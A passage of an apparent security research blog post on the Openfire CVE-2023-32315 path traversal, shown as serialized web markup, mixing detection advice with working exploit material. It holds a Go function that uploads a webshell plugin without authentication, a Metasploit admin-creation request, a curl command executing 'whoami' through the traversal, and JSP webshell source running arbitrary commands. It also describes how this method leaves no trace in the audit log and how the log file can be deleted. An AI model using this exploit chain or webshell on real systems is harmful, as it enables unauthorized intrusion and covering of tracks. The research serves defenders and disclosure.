
391},[1373,90230,90172],{"class":37971},[1373,90232,90233],{"class":1391},"BB",[1373,90235,90172],{"class":37971},[1373,90237,90238],{"class":1391},"BA",[1373,90240,90172],{"class":37971},[1373,90242,90243],{"class":1391},"E7",[1373,90245,90172],{"class":37971},[1373,90247,36855],{"class":1391},[1373,90249,90172],{"class":37971},[1373,90251,90252],{"class":1391},"A8",[1373,90254,90172],{"class":37971},[1373,90256,90257],{"class":1391},"E6",[1373,90259,90172],{"class":37971},[1373,90261,90219],{"class":1391},[1373,90263,90172],{"class":37971},[1373,90265,90266],{"class":1391},"B7",[1373,90268,183],{"class":1387},[1373,90270,5437],{"class":1383},[1373,90272,90273],{"class":4640}," t",[1373,90275,5437],{"class":1383},[1373,90277,90278],{"class":4640}," csrf",[1373,90280,5437],{"class":1383},[1373,90282,90283],{"class":4640}," username",[1373,90285,5437],{"class":1383},[1373,90287,90288],{"class":4640}," password",[1373,90290,5437],{"class":1383},[1373,90292,90288],{"class":4640},[1373,90294,11875],{"class":1383},[1373,90296,90297,90299,90301,90304,90306,90309,90311,90313,90315,90318],{"class":1375,"line":4692},[1373,90298,47190],{"class":4640},[1373,90300,5437],{"class":1383},[1373,90302,90303],{"class":4640}," err ",[1373,90305,5417],{"class":1397},[1373,90307,90308],{"class":4640}," rawhttp",[1373,90310,59],{"class":1383},[1373,90312,16869],{"class":7297},[1373,90314,1384],{"class":1383},[1373,90316,90317],{"class":4640},"createUserUrl",[1373,90319,11875],{"class":1383},[1373,90321,90322],{"class":1375,"line":4724},[1373,90323,6520],{"emptyLinePlaceholder":237},[1373,90325,90326,90329,90331,90334,90336,90338,90341,90343,90345,90347,90349,90351,90353,90355,90357,90360,90362,90364,90367,90369,90371,90374,90376,90378,90380],{"class":1375,"line":4756},[1373,90327,90328],{"class":4640},"m ",[1373,90330,20584],{"class":1397},[1373,90332,90333],{"class":1397}," 
map",[1373,90335,7035],{"class":1383},[1373,90337,15752],{"class":7293},[1373,90339,90340],{"class":1383},"][]",[1373,90342,15752],{"class":7293},[1373,90344,9149],{"class":1383},[1373,90346,183],{"class":1387},[1373,90348,6565],{"class":1391},[1373,90350,183],{"class":1387},[1373,90352,4606],{"class":1383},[1373,90354,5420],{"class":1383},[1373,90356,183],{"class":1387},[1373,90358,90359],{"class":1391},"JSESSIONID=",[1373,90361,183],{"class":1387},[1373,90363,15478],{"class":1397},[1373,90365,90366],{"class":4640}," jsessionid",[1373,90368,5437],{"class":1383},[1373,90370,4883],{"class":1387},[1373,90372,90373],{"class":1391},"csrf=",[1373,90375,183],{"class":1387},[1373,90377,15478],{"class":1397},[1373,90379,90278],{"class":4640},[1373,90381,9238],{"class":1383},[1373,90383,90384],{"class":1375,"line":4768},[1373,90385,6520],{"emptyLinePlaceholder":237},[1373,90387,90388,90390,90392,90394,90396,90398,90400,90403,90405,90407,90409,90411,90413,90416,90418,90420,90422,90425,90427,90429],{"class":1375,"line":4792},[1373,90389,47190],{"class":4640},[1373,90391,5437],{"class":1383},[1373,90393,90303],{"class":4640},[1373,90395,5417],{"class":1397},[1373,90397,90308],{"class":4640},[1373,90399,59],{"class":1383},[1373,90401,90402],{"class":7297},"DoRaw",[1373,90404,1384],{"class":1383},[1373,90406,183],{"class":1387},[1373,90408,6284],{"class":1391},[1373,90410,183],{"class":1387},[1373,90412,5437],{"class":1383},[1373,90414,90415],{"class":4640}," createUserUrl",[1373,90417,5437],{"class":1383},[1373,90419,16579],{"class":1387},[1373,90421,5437],{"class":1383},[1373,90423,90424],{"class":4640}," 
m",[1373,90426,5437],{"class":1383},[1373,90428,19247],{"class":7054},[1373,90430,11875],{"class":1383},[1373,90432,90433,90435,90437,90439,90441],{"class":1375,"line":4798},[1373,90434,4637],{"class":4636},[1373,90436,90303],{"class":4640},[1373,90438,15677],{"class":1397},[1373,90440,19247],{"class":7054},[1373,90442,4765],{"class":1383},[1373,90444,90445,90447,90449,90451,90453,90455],{"class":1375,"line":4806},[1373,90446,82848],{"class":4640},[1373,90448,59],{"class":1383},[1373,90450,19134],{"class":7297},[1373,90452,1384],{"class":1383},[1373,90454,28065],{"class":4640},[1373,90456,11875],{"class":1383},[1373,90458,90459],{"class":1375,"line":4817},[1373,90460,90461],{"class":4636}," return\n",[1373,90463,90464],{"class":1375,"line":4825},[1373,90465,1855],{"class":1383},[18,90467,85572,90468,90471],{},[886,90469,90470],{},"create="," is followed by a bunch of URL-encoded characters. They translate to 创建用户, or “create user”. For detection purposes, it’s important to know this isn’t a reliable value, as Openfire supports a variety of languages. For example, Metasploit sends this exact same admin creation request, but it’s slightly different. 
Here is Metasploit’s request on the wire (these requests can be POST requests, but both implementations opted for GET for whatever reason):",[1354,90473,90476],{"className":90474,"code":90475,"language":1359},[1357],"GET \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fuser-create.jsp?csrf=5QQN6JwEVq9LIW1&username=hqvvvarefibpfx&password=Qm7y4eZgU9&passwordConfirm=Qm7y4eZgU9&isadmin=on&create=Create%2bUser HTTP\u002F1.1\nHost: 10.9.49.143:9090\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F16.5 Mobile\u002F15E148 Safari\u002F604.1\nCookie: JSESSIONID=node06x26aqm77cqelg1crrhtstts10.node0; csrf=5QQN6JwEVq9LIW1\nContent-Type: application\u002Fx-www-form-urlencoded\n",[886,90477,90475],{"__ignoreMap":219},[18,90479,90480],{},"These exploits are creating an admin user to gain access to the Openfire Plugins interface. The plugin system allows administrators to add, more or less, arbitrary functionality to Openfire via uploaded Java JARs.",[18,90482,90483],{},[68,90484],{":width":10862,"alt":90485,"src":90486},"Openfire plugins page","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fopenfire-plugins.png",[18,90488,90489],{},"This is, very obviously, a place to transition from authentication bypass to remote code execution.",[18,90491,90492],{},"The tangxiaofeng7 exploit repository contains an Openfire plugin with a JSP webshell. Once the attacker has created administrative credentials, they can log in, upload tangxiaofeng7’s plugin, and gain access to a webshell. Similarly, the Metasploit module’s plugin is uploaded but initiates a reverse shell instead of a webshell.",[18,90494,90495,90496,90501],{},"Real-world attackers have followed this approach as well. 
For example, we know the Kinsing botnet likely followed this approach based on ",[47,90497,90500],{"href":90498,"rel":90499},"https:\u002F\u002Fdiscourse.igniterealtime.org\u002Ft\u002Fcve-2023-32315-openfire-administration-console-authentication-bypass\u002F92869\u002F15",[51],"comments"," from the Ignite Realtime forums.",[18,90503,90504,90505,90510],{},"Fortunately for defenders, the admin user creation is noisy. Another user on the forum ",[47,90506,90509],{"href":90507,"rel":90508},"https:\u002F\u002Fdiscourse.igniterealtime.org\u002Ft\u002Fcve-2023-32315-openfire-administration-console-authentication-bypass\u002F92869\u002F5",[51],"posted"," the Openfire security audit log after they’d been exploited (note that the audit log doesn’t disappear just because the system log file has been deleted):",[18,90512,90513],{},[68,90514],{":width":10862,"alt":90515,"src":90516},"Openfire security audit log after exploitation","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fsecurity-audit-log.png",[18,90518,90519,90520,90523,90524,90526,90527,90530,90531,90534,90535,90538],{},"Unfortunately for defenders, attackers don’t need to create a user or authenticate to upload a plugin. CVE-2023-32315 gives the attacker access to ",[886,90521,90522],{},"plugin-admin.jsp",", just as it gives the attacker access to ",[886,90525,90100],{},". So when we wrote our exploit, we opted for a user-less approach. 
We extracted a ",[886,90528,90529],{},"JSESSIONID"," and CSRF token from ",[886,90532,90533],{},"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp"," and then executed the following logic from our ",[47,90536,20558],{"href":14297,"rel":90537},[51],"-based exploit:",[1354,90540,90542],{"className":19022,"code":90541,"language":19024,"meta":219,"style":219},"func uploadWebshell(conf *config.Config, token string, session string) bool {\n    \u002F\u002F webshell is uploaded as a multipart upload\n    var multipartFile bytes.Buffer\n    writer := multipart.NewWriter(&multipartFile)\n    header := make(textproto.MIMEHeader)\n    header.Set(\"Content-Disposition\", `form-data; name=\"uploadfile\"; filename=\"exampleplugin.jar\"`)\n    header.Set(\"Content-Type\", \"application\u002Fx-java-archive\")\n\n    \u002F\u002F copy the webshell into the writer\n    filedata, _ := writer.CreatePart(header)\n    _, _ = io.Copy(filedata, strings.NewReader(webshell))\n    writer.Close()\n\n    \u002F\u002F upload it\n    headers := map[string]string{\n        \"Cookie\":    fmt.Sprintf(\"JSESSIONID=%s;csrf=%s\", session, token),\n        \"Content-Type\": writer.FormDataContentType(),\n    }\n\n    \u002F\u002F create a normal request. 
Go does not like the %u in their standard req, so create a\n    \u002F\u002F normal request and then insert the malformed URI into the URL struct\n    url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002F\")\n    client, req, err := protocol.CreateRequest(\"POST\", url, multipartFile.String(), false)\n    if err {\n        return false\n    }\n\n    req.URL.Opaque = \"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp?uploadplugin&csrf=\" + token\n\n    protocol.SetRequestHeaders(req, headers)\n    resp, _, ok := protocol.DoRequest(client, req)\n    if !ok {\n        return false\n    }\n    if resp.StatusCode != 500 {\n        output.PrintfError(\"Expected 500 response: %d\", resp.StatusCode)\n\n        return false\n    }\n\n    return true\n}\n",[886,90543,90544,90582,90587,90603,90627,90649,90679,90706,90710,90715,90742,90782,90794,90798,90803,90822,90863,90883,90887,90891,90896,90901,90947,90997,91005,91011,91015,91019,91047,91051,91072,91105,91115,91121,91125,91141,91170,91174,91180,91184,91188,91194],{"__ignoreMap":219},[1373,90545,90546,90548,90551,90553,90555,90557,90559,90561,90563,90565,90568,90570,90572,90574,90576,90578,90580],{"class":1375,"line":1376},[1373,90547,19088],{"class":1397},[1373,90549,90550],{"class":7297}," uploadWebshell",[1373,90552,1384],{"class":1383},[1373,90554,38107],{"class":19096},[1373,90556,19113],{"class":1397},[1373,90558,38112],{"class":14938},[1373,90560,59],{"class":1383},[1373,90562,38117],{"class":14938},[1373,90564,5437],{"class":1383},[1373,90566,90567],{"class":19096}," token",[1373,90569,15757],{"class":7293},[1373,90571,5437],{"class":1383},[1373,90573,4521],{"class":19096},[1373,90575,15757],{"class":7293},[1373,90577,2230],{"class":1383},[1373,90579,16303],{"class":7293},[1373,90581,4765],{"class":1383},[1373,90583,90584],{"class":1375,"line":220},[1373,90585,90586],{"class":4630},"    \u002F\u002F webshell is uploaded as a multipart 
upload\n",[1373,90588,90589,90592,90595,90598,90600],{"class":1375,"line":1266},[1373,90590,90591],{"class":1397},"    var",[1373,90593,90594],{"class":4640}," multipartFile ",[1373,90596,90597],{"class":14938},"bytes",[1373,90599,59],{"class":1383},[1373,90601,90602],{"class":14938},"Buffer\n",[1373,90604,90605,90608,90610,90613,90615,90618,90620,90622,90625],{"class":1375,"line":1852},[1373,90606,90607],{"class":4640},"    writer ",[1373,90609,20584],{"class":1397},[1373,90611,90612],{"class":4640}," multipart",[1373,90614,59],{"class":1383},[1373,90616,90617],{"class":7297},"NewWriter",[1373,90619,1384],{"class":1383},[1373,90621,7218],{"class":1397},[1373,90623,90624],{"class":4640},"multipartFile",[1373,90626,11875],{"class":1383},[1373,90628,90629,90632,90634,90637,90639,90642,90644,90647],{"class":1375,"line":4692},[1373,90630,90631],{"class":4640},"    header ",[1373,90633,20584],{"class":1397},[1373,90635,90636],{"class":7297}," make",[1373,90638,1384],{"class":1383},[1373,90640,90641],{"class":14938},"textproto",[1373,90643,59],{"class":1383},[1373,90645,90646],{"class":14938},"MIMEHeader",[1373,90648,11875],{"class":1383},[1373,90650,90651,90654,90656,90659,90661,90663,90666,90668,90670,90672,90675,90677],{"class":1375,"line":4724},[1373,90652,90653],{"class":4640},"    header",[1373,90655,59],{"class":1383},[1373,90657,90658],{"class":7297},"Set",[1373,90660,1384],{"class":1383},[1373,90662,183],{"class":1387},[1373,90664,90665],{"class":1391},"Content-Disposition",[1373,90667,183],{"class":1387},[1373,90669,5437],{"class":1383},[1373,90671,19163],{"class":1387},[1373,90673,90674],{"class":1391},"form-data; name=\"uploadfile\"; 
filename=\"exampleplugin.jar\"",[1373,90676,19169],{"class":1387},[1373,90678,11875],{"class":1383},[1373,90680,90681,90683,90685,90687,90689,90691,90693,90695,90697,90699,90702,90704],{"class":1375,"line":4756},[1373,90682,90653],{"class":4640},[1373,90684,59],{"class":1383},[1373,90686,90658],{"class":7297},[1373,90688,1384],{"class":1383},[1373,90690,183],{"class":1387},[1373,90692,6391],{"class":1391},[1373,90694,183],{"class":1387},[1373,90696,5437],{"class":1383},[1373,90698,4883],{"class":1387},[1373,90700,90701],{"class":1391},"application\u002Fx-java-archive",[1373,90703,183],{"class":1387},[1373,90705,11875],{"class":1383},[1373,90707,90708],{"class":1375,"line":4768},[1373,90709,6520],{"emptyLinePlaceholder":237},[1373,90711,90712],{"class":1375,"line":4792},[1373,90713,90714],{"class":4630},"    \u002F\u002F copy the webshell into the writer\n",[1373,90716,90717,90720,90722,90725,90727,90730,90732,90735,90737,90740],{"class":1375,"line":4798},[1373,90718,90719],{"class":4640},"    filedata",[1373,90721,5437],{"class":1383},[1373,90723,90724],{"class":4640}," _ ",[1373,90726,20584],{"class":1397},[1373,90728,90729],{"class":4640}," writer",[1373,90731,59],{"class":1383},[1373,90733,90734],{"class":7297},"CreatePart",[1373,90736,1384],{"class":1383},[1373,90738,90739],{"class":4640},"header",[1373,90741,11875],{"class":1383},[1373,90743,90744,90747,90749,90751,90753,90756,90758,90761,90763,90766,90768,90771,90773,90776,90778,90780],{"class":1375,"line":4806},[1373,90745,90746],{"class":4640},"    _",[1373,90748,5437],{"class":1383},[1373,90750,90724],{"class":4640},[1373,90752,5417],{"class":1397},[1373,90754,90755],{"class":4640}," io",[1373,90757,59],{"class":1383},[1373,90759,90760],{"class":7297},"Copy",[1373,90762,1384],{"class":1383},[1373,90764,90765],{"class":4640},"filedata",[1373,90767,5437],{"class":1383},[1373,90769,90770],{"class":4640}," 
strings",[1373,90772,59],{"class":1383},[1373,90774,90775],{"class":7297},"NewReader",[1373,90777,1384],{"class":1383},[1373,90779,22748],{"class":4640},[1373,90781,16761],{"class":1383},[1373,90783,90784,90787,90789,90792],{"class":1375,"line":4817},[1373,90785,90786],{"class":4640},"    writer",[1373,90788,59],{"class":1383},[1373,90790,90791],{"class":7297},"Close",[1373,90793,27326],{"class":1383},[1373,90795,90796],{"class":1375,"line":4825},[1373,90797,6520],{"emptyLinePlaceholder":237},[1373,90799,90800],{"class":1375,"line":4835},[1373,90801,90802],{"class":4630},"    \u002F\u002F upload it\n",[1373,90804,90805,90808,90810,90812,90814,90816,90818,90820],{"class":1375,"line":4843},[1373,90806,90807],{"class":4640},"    headers ",[1373,90809,20584],{"class":1397},[1373,90811,90333],{"class":1397},[1373,90813,7035],{"class":1383},[1373,90815,15752],{"class":7293},[1373,90817,15050],{"class":1383},[1373,90819,15752],{"class":7293},[1373,90821,8904],{"class":1383},[1373,90823,90824,90826,90828,90830,90832,90834,90836,90838,90840,90842,90844,90846,90849,90851,90853,90855,90857,90859,90861],{"class":1375,"line":4849},[1373,90825,28414],{"class":1387},[1373,90827,6565],{"class":1391},[1373,90829,183],{"class":1387},[1373,90831,4606],{"class":1383},[1373,90833,19129],{"class":4640},[1373,90835,59],{"class":1383},[1373,90837,82853],{"class":7297},[1373,90839,1384],{"class":1383},[1373,90841,183],{"class":1387},[1373,90843,90359],{"class":1391},[1373,90845,38048],{"class":37971},[1373,90847,90848],{"class":1391},";csrf=",[1373,90850,38048],{"class":37971},[1373,90852,183],{"class":1387},[1373,90854,5437],{"class":1383},[1373,90856,4521],{"class":4640},[1373,90858,5437],{"class":1383},[1373,90860,90567],{"class":4640},[1373,90862,17933],{"class":1383},[1373,90864,90865,90867,90869,90871,90873,90875,90877,90880],{"class":1375,"line":4877},[1373,90866,28414],{"class":1387},[1373,90868,6391],{"class":1391},[1373,90870,183],{"class":1387},[1373,90872,4606],{"class":1383},[1
373,90874,90729],{"class":4640},[1373,90876,59],{"class":1383},[1373,90878,90879],{"class":7297},"FormDataContentType",[1373,90881,90882],{"class":1383},"(),\n",[1373,90884,90885],{"class":1375,"line":4915},[1373,90886,4795],{"class":1383},[1373,90888,90889],{"class":1375,"line":4931},[1373,90890,6520],{"emptyLinePlaceholder":237},[1373,90892,90893],{"class":1375,"line":4947},[1373,90894,90895],{"class":4630},"    \u002F\u002F create a normal request. Go does not like the %u in their standard req, so create a\n",[1373,90897,90898],{"class":1375,"line":4952},[1373,90899,90900],{"class":4630},"    \u002F\u002F normal request and then insert the malformed URI into the URL struct\n",[1373,90902,90903,90905,90907,90909,90911,90913,90915,90917,90919,90921,90923,90925,90927,90929,90931,90933,90935,90937,90939,90941,90943,90945],{"class":1375,"line":6776},[1373,90904,38128],{"class":4640},[1373,90906,20584],{"class":1397},[1373,90908,20615],{"class":4640},[1373,90910,59],{"class":1383},[1373,90912,20638],{"class":7297},[1373,90914,1384],{"class":1383},[1373,90916,38107],{"class":4640},[1373,90918,59],{"class":1383},[1373,90920,38145],{"class":4640},[1373,90922,5437],{"class":1383},[1373,90924,20633],{"class":4640},[1373,90926,59],{"class":1383},[1373,90928,38154],{"class":4640},[1373,90930,5437],{"class":1383},[1373,90932,20633],{"class":4640},[1373,90934,59],{"class":1383},[1373,90936,38163],{"class":4640},[1373,90938,5437],{"class":1383},[1373,90940,4883],{"class":1387},[1373,90942,2180],{"class":1391},[1373,90944,183],{"class":1387},[1373,90946,11875],{"class":1383},[1373,90948,90949,90952,90954,90957,90959,90961,90963,90965,90967,90970,90972,90974,90976,90978,90980,90982,90984,90987,90989,90991,90993,90995],{"class":1375,"line":6781},[1373,90950,90951],{"class":4640},"    client",[1373,90953,5437],{"class":1383},[1373,90955,90956],{"class":4640}," 
req",[1373,90958,5437],{"class":1383},[1373,90960,90303],{"class":4640},[1373,90962,20584],{"class":1397},[1373,90964,20615],{"class":4640},[1373,90966,59],{"class":1383},[1373,90968,90969],{"class":7297},"CreateRequest",[1373,90971,1384],{"class":1383},[1373,90973,183],{"class":1387},[1373,90975,6946],{"class":1391},[1373,90977,183],{"class":1387},[1373,90979,5437],{"class":1383},[1373,90981,37890],{"class":4640},[1373,90983,5437],{"class":1383},[1373,90985,90986],{"class":4640}," multipartFile",[1373,90988,59],{"class":1383},[1373,90990,27524],{"class":7297},[1373,90992,18929],{"class":1383},[1373,90994,16311],{"class":14985},[1373,90996,11875],{"class":1383},[1373,90998,90999,91001,91003],{"class":1375,"line":7524},[1373,91000,4695],{"class":4636},[1373,91002,90303],{"class":4640},[1373,91004,8904],{"class":1383},[1373,91006,91007,91009],{"class":1375,"line":7530},[1373,91008,4918],{"class":4636},[1373,91010,16195],{"class":14985},[1373,91012,91013],{"class":1375,"line":7546},[1373,91014,4795],{"class":1383},[1373,91016,91017],{"class":1375,"line":7571},[1373,91018,6520],{"emptyLinePlaceholder":237},[1373,91020,91021,91024,91026,91028,91030,91033,91035,91037,91040,91042,91044],{"class":1375,"line":7598},[1373,91022,91023],{"class":4640},"    req",[1373,91025,59],{"class":1383},[1373,91027,2170],{"class":4640},[1373,91029,59],{"class":1383},[1373,91031,91032],{"class":4640},"Opaque ",[1373,91034,5417],{"class":1397},[1373,91036,4883],{"class":1387},[1373,91038,91039],{"class":1391},"\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp?uploadplugin&csrf=",[1373,91041,183],{"class":1387},[1373,91043,15478],{"class":1397},[1373,91045,91046],{"class":4640}," token\n",[1373,91048,91049],{"class":1375,"line":7615},[1373,91050,6520],{"emptyLinePlaceholder":237},[1373,91052,91053,91056,91058,91061,91063,91066,91068,91070],{"class":1375,"line":7635},[1373,91054,91055],{"class":4640},"    
protocol",[1373,91057,59],{"class":1383},[1373,91059,91060],{"class":7297},"SetRequestHeaders",[1373,91062,1384],{"class":1383},[1373,91064,91065],{"class":4640},"req",[1373,91067,5437],{"class":1383},[1373,91069,20906],{"class":4640},[1373,91071,11875],{"class":1383},[1373,91073,91074,91076,91078,91081,91083,91085,91087,91089,91091,91094,91096,91099,91101,91103],{"class":1375,"line":7640},[1373,91075,37858],{"class":4640},[1373,91077,5437],{"class":1383},[1373,91079,91080],{"class":4640}," _",[1373,91082,5437],{"class":1383},[1373,91084,20610],{"class":4640},[1373,91086,20584],{"class":1397},[1373,91088,20615],{"class":4640},[1373,91090,59],{"class":1383},[1373,91092,91093],{"class":7297},"DoRequest",[1373,91095,1384],{"class":1383},[1373,91097,91098],{"class":4640},"client",[1373,91100,5437],{"class":1383},[1373,91102,90956],{"class":4640},[1373,91104,11875],{"class":1383},[1373,91106,91107,91109,91111,91113],{"class":1375,"line":7648},[1373,91108,4695],{"class":4636},[1373,91110,7370],{"class":1397},[1373,91112,20662],{"class":4640},[1373,91114,8904],{"class":1383},[1373,91116,91117,91119],{"class":1375,"line":7672},[1373,91118,4918],{"class":4636},[1373,91120,16195],{"class":14985},[1373,91122,91123],{"class":1375,"line":7688},[1373,91124,4795],{"class":1383},[1373,91126,91127,91129,91131,91133,91135,91137,91139],{"class":1375,"line":7709},[1373,91128,4695],{"class":4636},[1373,91130,37927],{"class":4640},[1373,91132,59],{"class":1383},[1373,91134,37932],{"class":4640},[1373,91136,15677],{"class":1397},[1373,91138,37949],{"class":5467},[1373,91140,4765],{"class":1383},[1373,91142,91143,91145,91147,91149,91151,91153,91156,91158,91160,91162,91164,91166,91168],{"class":1375,"line":7714},[1373,91144,37956],{"class":4640},[1373,91146,59],{"class":1383},[1373,91148,37961],{"class":7297},[1373,91150,1384],{"class":1383},[1373,91152,183],{"class":1387},[1373,91154,91155],{"class":1391},"Expected 500 response: 
",[1373,91157,37972],{"class":37971},[1373,91159,183],{"class":1387},[1373,91161,5437],{"class":1383},[1373,91163,37927],{"class":4640},[1373,91165,59],{"class":1383},[1373,91167,37983],{"class":4640},[1373,91169,11875],{"class":1383},[1373,91171,91172],{"class":1375,"line":7722},[1373,91173,6520],{"emptyLinePlaceholder":237},[1373,91175,91176,91178],{"class":1375,"line":9903},[1373,91177,4918],{"class":4636},[1373,91179,16195],{"class":14985},[1373,91181,91182],{"class":1375,"line":9908},[1373,91183,4795],{"class":1383},[1373,91185,91186],{"class":1375,"line":9913},[1373,91187,6520],{"emptyLinePlaceholder":237},[1373,91189,91190,91192],{"class":1375,"line":9932},[1373,91191,7340],{"class":4636},[1373,91193,38077],{"class":14985},[1373,91195,91196],{"class":1375,"line":9937},[1373,91197,1855],{"class":1383},[18,91199,91200,91201,91204],{},"As you can see, we are just uploading the plugin JAR via a POST request (and working around a bit of Go-foolishness associated with the ",[886,91202,91203],{},"%u002e"," in the URI). Without authentication, the plugin is accepted and installed. The webshell can then be accessed, without authentication, using the traversal. 
For example:",[1354,91206,91208],{"className":31740,"code":91207,"language":2186,"meta":219,"style":219},"curl -v \"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=whoami\"\n",[886,91209,91210],{"__ignoreMap":219},[1373,91211,91212,91214,91216,91218,91221],{"class":1375,"line":1376},[1373,91213,1557],{"class":2206},[1373,91215,45584],{"class":2209},[1373,91217,4883],{"class":1387},[1373,91219,91220],{"class":1391},"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=whoami",[1373,91222,19057],{"class":1387},[18,91224,91225,91226,91229],{},"This approach keeps login attempts out of the security audit log and prevents the “uploaded plugin” notification from being recorded. That’s a pretty big deal because it leaves ",[295,91227,91228],{},"no evidence"," in the security audit log. For example, this is the security audit log for a system we exploited:",[18,91231,91232],{},[68,91233],{":width":10862,"alt":91234,"src":91235},"Empty Openfire security audit log after exploitation","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fempty-log.png",[18,91237,91238],{},"As you can see, there is absolutely nothing to indicate anything is amiss.",[18,91240,91241,91242,91245],{},"The actual openfire.log file tells a different story (depending on your installation, it may be found at ",[886,91243,91244],{},"\u002Fmnt\u002Fopenfire\u002Flogs\u002Fopenfire.log","). 
You can find these important indicators in this log file:",[1925,91247,91248],{},[18,91249,91250,91251,91254],{},"2023.08.18 17:19:49 WARN ",[1373,91252,91253],{},"Jetty-QTP-AdminConsole-39",": org.eclipse.jetty.server.handler.ContextHandler.ROOT - Unhandled exception occurred whilst decorating page\njava.lang.NullPointerException: Cannot invoke \"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[1925,91256,91257],{},[18,91258,91250,91259,91261],{},[1373,91260,91253],{},": org.eclipse.jetty.server.HttpChannel - \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugin-admin.jsp\njava.lang.NullPointerException: Cannot invoke \"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[18,91263,91264],{},"Unfortunately, an attacker could use the path traversal to delete the log file. Depending on the permissions of the Openfire user, the attacker might be able to delete the log file via the webshell\u002Freverse shell, which leaves the plugin itself as the only artifact that indicates exploitation. This is why it's important to know how one is crafted when analyzing a system that might have been exploited.",[18,91266,91267,91268,91273,91274,91277],{},"We were very lazy when crafting our plugin. We just used the ",[47,91269,91272],{"href":91270,"rel":91271},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin",[51],"Openfire example plugin",". 
The only modification we made was to ",[886,91275,91276],{},"\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp"," when we changed the JSP into a very simple webshell (with a weird X-Header that we’ll touch on later).",[1354,91279,91281],{"className":27194,"code":91280,"language":27196,"meta":219,"style":219},"\u003C%\nString cmd = request.getParameter(\"cmd\");\nif ( cmd != null) {\n    java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());\n    String line = in.readLine();\n    if (line != null) {\n     response.setHeader(\"X-Error\", line);\n    }\n} %>\n",[886,91282,91283,91288,91312,91328,91382,91400,91417,91443,91447],{"__ignoreMap":219},[1373,91284,91285],{"class":1375,"line":1376},[1373,91286,91287],{"class":1397},"\u003C%\n",[1373,91289,91290,91292,91294,91296,91298,91300,91302,91304,91306,91308,91310],{"class":1375,"line":220},[1373,91291,27524],{"class":27228},[1373,91293,75120],{"class":4640},[1373,91295,5417],{"class":1397},[1373,91297,75125],{"class":4640},[1373,91299,59],{"class":1383},[1373,91301,75130],{"class":7297},[1373,91303,1384],{"class":1383},[1373,91305,183],{"class":1387},[1373,91307,17653],{"class":1391},[1373,91309,183],{"class":1387},[1373,91311,4680],{"class":1383},[1373,91313,91314,91316,91318,91320,91322,91324,91326],{"class":1375,"line":1266},[1373,91315,4637],{"class":4636},[1373,91317,4641],{"class":1383},[1373,91319,75120],{"class":4640},[1373,91321,15677],{"class":1397},[1373,91323,15680],{"class":7054},[1373,91325,2230],{"class":1383},[1373,91327,4765],{"class":1383},[1373,91329,91330,91333,91335,91338,91340,91343,91345,91347,91349,91351,91353,91355,91357,91359,91361,91364,91366,91368,91370,91372,91374,91376,91378,91380],{"class":1375,"line":1852},[1373,91331,91332],{"class":27228},"    
java",[1373,91334,59],{"class":1383},[1373,91336,91337],{"class":27228},"io",[1373,91339,59],{"class":1383},[1373,91341,91342],{"class":27228},"DataInputStream",[1373,91344,50864],{"class":4640},[1373,91346,5417],{"class":1397},[1373,91348,15283],{"class":4636},[1373,91350,74377],{"class":4640},[1373,91352,59],{"class":1383},[1373,91354,91337],{"class":4640},[1373,91356,59],{"class":1383},[1373,91358,91342],{"class":7297},[1373,91360,1384],{"class":1383},[1373,91362,91363],{"class":4640},"Runtime",[1373,91365,59],{"class":1383},[1373,91367,27896],{"class":7297},[1373,91369,16355],{"class":1383},[1373,91371,27901],{"class":7297},[1373,91373,1384],{"class":1383},[1373,91375,17653],{"class":4640},[1373,91377,27987],{"class":1383},[1373,91379,75285],{"class":7297},[1373,91381,16360],{"class":1383},[1373,91383,91384,91387,91390,91392,91394,91396,91398],{"class":1375,"line":4692},[1373,91385,91386],{"class":27228},"    String",[1373,91388,91389],{"class":4640}," line ",[1373,91391,5417],{"class":1397},[1373,91393,57301],{"class":4640},[1373,91395,59],{"class":1383},[1373,91397,75325],{"class":7297},[1373,91399,15603],{"class":1383},[1373,91401,91402,91404,91406,91409,91411,91413,91415],{"class":1375,"line":4724},[1373,91403,4695],{"class":4636},[1373,91405,4641],{"class":1383},[1373,91407,91408],{"class":4640},"line ",[1373,91410,15677],{"class":1397},[1373,91412,15680],{"class":7054},[1373,91414,2230],{"class":1383},[1373,91416,4765],{"class":1383},[1373,91418,91419,91422,91424,91427,91429,91431,91434,91436,91438,91441],{"class":1375,"line":4756},[1373,91420,91421],{"class":4640},"     response",[1373,91423,59],{"class":1383},[1373,91425,91426],{"class":7297},"setHeader",[1373,91428,1384],{"class":1383},[1373,91430,183],{"class":1387},[1373,91432,91433],{"class":1391},"X-Error",[1373,91435,183],{"class":1387},[1373,91437,5437],{"class":1383},[1373,91439,91440],{"class":4640}," 
